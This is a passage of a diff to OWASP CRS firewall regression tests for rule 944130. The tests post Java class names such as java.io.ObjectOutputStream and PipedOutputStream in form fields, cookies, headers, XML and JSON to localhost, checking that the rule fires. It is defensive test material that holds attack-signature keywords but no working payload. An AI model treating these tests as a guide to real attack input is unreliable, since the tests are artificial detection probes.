"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log: + expect_ids: [944130] + - test_id: 175 desc: "Content-Type application/json arg value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.LineNumberReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-176 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.LineNumberReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 176 desc: "Content-Type application/json arg name includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.LineNumberReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-177 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.LineNumberReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 177 desc: "Argument test includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-178 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 178 desc: "Argument name includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-179 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 179 desc: "Cookie test includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ObjectOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-180 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ObjectOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 180 desc: "Cookie name includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ObjectOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-181 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ObjectOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 181 desc: "Request header test includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ObjectOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-182 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ObjectOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 182 desc: "XML attribute value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-183 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 183 desc: "XML element value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-184 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 184 desc: "Nested XML element value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-185 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 185 desc: "Content-Type text/plain includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-186 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 186 desc: "Content-Type application/json arg value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ObjectOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-187 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ObjectOutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 187 desc: "Content-Type application/json arg name includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.ObjectOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-188 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.ObjectOutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 188 desc: "Argument test includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-189 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log: + expect_ids: [944130] + - test_id: 189 desc: "Argument name includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.OutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-190 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.OutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 190 desc: "Cookie test includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.OutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-191 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.OutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 191 desc: "Cookie name includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.OutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-192 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.OutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 192 desc: "Request header test includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.OutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-193 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.OutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 193 desc: "XML attribute value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-194 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 194 desc: "XML element value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-195 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log: + expect_ids: [944130] + - test_id: 195 desc: "Nested XML element value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-196 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log: + expect_ids: [944130] + - test_id: 196 desc: "Content-Type text/plain includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-197 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log: + expect_ids: [944130] + - test_id: 197 desc: "Content-Type application/json arg value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.OutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-198 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.OutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 198 desc: "Content-Type application/json arg name includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.OutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-199 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.OutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 199 desc: "Argument test includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-200 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 200 desc: "Argument name includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-201 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 201 desc: "Cookie test includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PipedOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-202 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 202 desc: "Cookie name includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 